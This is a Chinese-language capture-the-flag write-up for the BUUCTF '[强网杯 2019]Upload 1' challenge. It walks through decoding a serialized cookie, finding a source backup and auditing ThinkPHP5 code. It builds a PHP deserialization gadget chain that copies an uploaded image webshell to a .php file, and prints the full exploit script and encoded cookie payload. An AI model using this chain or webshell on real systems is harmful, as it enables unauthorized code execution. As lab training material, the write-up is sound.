题目来源：buuctf  [强网杯 2019]Upload 1

目录

一、打开靶机，查看信息

二、解题思路

step 1：登陆进去看情况

step 2：大佬来支援——问题在cookie

step 3：测试两个思路

1.目录穿越

2.目录扫描

step 4：代码审计

step 5：魔术方法利用copy

step 5：调用方法

step 6：得到上传路径

step 7：蚁剑连接

三、小结

---

一、打开靶机，查看信息

        根据题目可得是文件上传题目，但这里并没有上传文件的地方，先注册账号登陆进去看看情况。

二、解题思路

step 1：登陆进去看情况

        上传了个gif文件，发现变成了头像，查看源码发现文件名和后缀都被改了,

step 2：大佬来支援——问题在cookie

        确实没有头绪了，看了大佬的wp，发现cookie有新信息。

这里提示：下次可以抓包看新信息，抓包也可以发现这里的问题

        很像base x编码，但是少了点东西，base 64少了俩==，去试试，发现提示：只有302位，不是4的倍数，无法解码。这不巧了？加上俩==，刚好304位可以解码了，得到熟悉的东西：

a:5:{s:2:"ID";i:4;s:8:"username";s:1:"1";s:5:"email";s:10:"123@qq.com";s:8:"password";s:32:"202cb962ac59075b964b07152d234b70";s:3:"img";s:79:"../upload/5e6f2693d111128ec4f1d7336f65b87f/ab7a128e83ca216c120791232caaf9a9.png";}7

        是序列化数据。所以说cookie为注册信息序列化后的值，这里有两个思路：①根据序列化中传入的路径能否目录穿越；②扫描网站备份文件

step 3：测试两个思路

1.目录穿越

        没有什么思路，先pass掉

2.目录扫描

        扫描出一个www.tar.gz在网页根目录，下载下来看一下

        这样才能下载下来，发现是ThinkPHP5框架，看看其中内容

        既然是php文件，用phpstorm打开，主要功能在这四个文件上，要开始代码审计了

step 4：代码审计

        代码太多了，我们要找重点，比如刚才的登陆页面只有上传文件的cookie信息。

        整体功能：从用户的Cookie中获取用户信息，将其解码和反序列化，然后与数据库中的用户信息进行比较，以验证用户登陆是否有效。

        而且还会对cookie数据进行base64解码，然后进行反序列化，将其转换为原始的数据结构

        然后找找upload代码信息

        大佬说利用点在这里：copy。这个copy(source,dest)将文件从source拷贝到dest。成功时返回TRUE，失败时返回FALSE，所以这里的$this->filename_tmp和$thie->filename在可控的情况下，可以将上传的一句话的png格式文件拷贝成php后缀的文件，这样就可以运行一句话了。即

copy($this->filename_tmp,$this->filename); // 最终得到一个shell.php文件

        那么该怎么利用呢？

step 5：魔术方法利用copy

        这里要用到两个魔术方法：①__get()；②__call()

__get()：一个类里有私有变量，外界无法访问，可以用该魔术方法间接访问

示例：

__call()：调用了一个类里没有的方法，那么就会自动调用该魔术方法，其中第一个参数表示不存在的方法名字，第二个参数接收传入的参数

示例：

在Profile.php是这样呈现的

        在__call方法中，需要将$this->{ $this->{$name}}中的蓝色部分的值为upload_img，就能调用upload_img方法，那怎么做到呢？

        （我想不出来(´。＿。｀)，看看大佬们的wp吧，看懂了就算学会了）

step 5：调用方法

以下步骤摘自BUUCTF-WEB 【强网杯】 2019]Upload 1 | Fan的小酒馆

        在Register.php文件中。

Register中的__destruct方法调用了$this->checker->index();假设，我们把$this->checker改成Profile类，那这里的语句就能够触发Profile::__call方法。这样一条链条就形成了。

Register::__construct()->Register::__destruct()->Profile::__call()->Profile::__get()->Profile::__call()->Profile::upload_img()->copy()

Register::__construct()中将$this->checker指定为new Profile(),

Register::__destruct() 会调用Profile类中的index方法，发现找不到，会触发Profile::__call。

public function __get($name)
    {
        echo $name;
        return $this->except[$name];
    }
public function __call($name, $arguments)
    {
        if ($this->{$name}) {
            $this->{$this->{$name}}($arguments);
        }
    }

        触发Profile::__call,$name的值则为index,当执行到$this->{$name}发现找不到index这个属性，又会触发__get，__get则会从$this->except数组中取键名为index的值返回。当我们把$this->except属性值设置为["index"=>"upload_img"]，这样在执行$this->{$this->{$name}}($arguments);一句时，$this->{$name}不就是upload_img了吗。然后就会进入到upload_img方法中，接下来只需要修改一些属性值，就能执行到copy($this->filename_tmp,$this->filename);。这里怎么利用刚刚已经说过了。

(感叹一下这个思路，看懂了链式反应，但是看不进去。。。再努努力）

        下一步：先注册一个账号，上传一个图片格式后缀的一句话木马(加GIF89a),拿到上传路径。

step 6：得到上传路径

        没有得到跳转，所以去cookie信息里找到的

/upload/5e6f2693d111128ec4f1d7336f65b87f/39e37d1a8e648846d5afe11e7e9c3ee2.png

        上脚本进行序列化（脚本来源：[强网杯 2019]Upload | 北歌）

<?php

namespace app\web\controller;
error_reporting(0);
class Profile
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;


    public function __get($name)
    {
        return $this->except[$name];
    }

    public function __call($name, $arguments)
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

}

class Register
{
    public $checker;
    public $registed;

    public function __destruct()
    {
        if(!$this->registed){
            $this->checker->index();
        }
    }

}

$profile = new Profile();
$profile->except = ['index' => 'img'];
$profile->img = "upload_img";
$profile->ext = "png";
$profile->filename_tmp = "./upload/5e6f2693d111128ec4f1d7336f65b87f/39e37d1a8e648846d5afe11e7e9c3ee2.png";
$profile->filename = "./upload/5e6f2693d111128ec4f1d7336f65b87f/39e37d1a8e648846d5afe11e7e9c3ee2.php";

$register = new Register();
$register->registed = false;
$register->checker = $profile;

echo urlencode(base64_encode(serialize($register)));

TzoyNzoiYXBwXHdlYlxjb250cm9sbGVyXFJlZ2lzdGVyIjoyOntzOjc6ImNoZWNrZXIiO086MjY6ImFwcFx3ZWJcY29udHJvbGxlclxQcm9maWxlIjo3OntzOjc6ImNoZWNrZXIiO047czoxMjoiZmlsZW5hbWVfdG1wIjtzOjc4OiIuL3VwbG9hZC81ZTZmMjY5M2QxMTExMjhlYzRmMWQ3MzM2ZjY1Yjg3Zi8zOWUzN2QxYThlNjQ4ODQ2ZDVhZmUxMWU3ZTljM2VlMi5wbmciO3M6ODoiZmlsZW5hbWUiO3M6Nzg6Ii4vdXBsb2FkLzVlNmYyNjkzZDExMTEyOGVjNGYxZDczMzZmNjViODdmLzM5ZTM3ZDFhOGU2NDg4NDZkNWFmZTExZTdlOWMzZWUyLnBocCI7czoxMToidXBsb2FkX21lbnUiO047czozOiJleHQiO3M6MzoicG5nIjtzOjM6ImltZyI7czoxMDoidXBsb2FkX2ltZyI7czo2OiJleGNlcHQiO2E6MTp7czo1OiJpbmRleCI7czozOiJpbWciO319czo4OiJyZWdpc3RlZCI7YjowO30%3D

        然后将其放入cookie后，在根目录多刷新几次，发现再次访问这个文件夹就是php文件，并且成功解析一句话，可以上蚁剑了

step 7：蚁剑连接

        常规操作

URL：实例无法访问 / Instance can't be reached at that time | BUUCTF

成功找到flag

三、小结

1.这个题跨越两天，不知道为什么第一天蚁剑怎么都连不上，明明看到文件上传成功，也看到了/upload/界面上传路径，但是马始终显示不出来。无奈只能暂时放弃，结果第二天一次成功，有古怪。所以第一天做不出来可以先放放

2.查看页面信息，不要忘记cookie数据

3.数据信息解密也很重要

4.学习到两个魔术方法：__get()、__call()

5.代码审计逻辑要明白

​​​​​